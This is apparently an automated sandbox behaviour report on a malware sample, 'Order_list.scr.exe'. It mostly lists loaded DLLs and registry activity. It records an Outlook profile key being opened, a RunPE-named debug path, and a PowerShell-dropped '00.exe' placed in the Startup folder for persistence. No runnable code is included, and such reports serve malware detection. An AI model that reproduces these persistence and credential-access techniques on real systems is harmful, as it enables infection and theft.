            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Order_list.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Order_list.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Order_list.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: Order_list.scr.exe, 00000000.00000002.4142462023.0000000002611000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000000.00000002.4171576105.0000000004DC0000.00000004.08000000.00040000.00000000.sdmp, 00.exe, 00000005.00000002.4140969217.0000000002931000.00000004.00000800.00020000.00000000.sdmp
            Source: Order_list.scr.exeStatic PE information: 0xF79C3086 [Tue Aug 23 02:46:30 2101 UTC]
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_06322E78 push esp; iretd 8_2_06322E79
            Source: Order_list.scr.exeStatic PE information: section name: .text entropy: 7.01381456901877
            Source: 00.exe.1.drStatic PE information: section name: .text entropy: 7.01381456901877
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeJump to dropped file

            Boot Survival

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe\:Zone.Identifier:$DATAJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
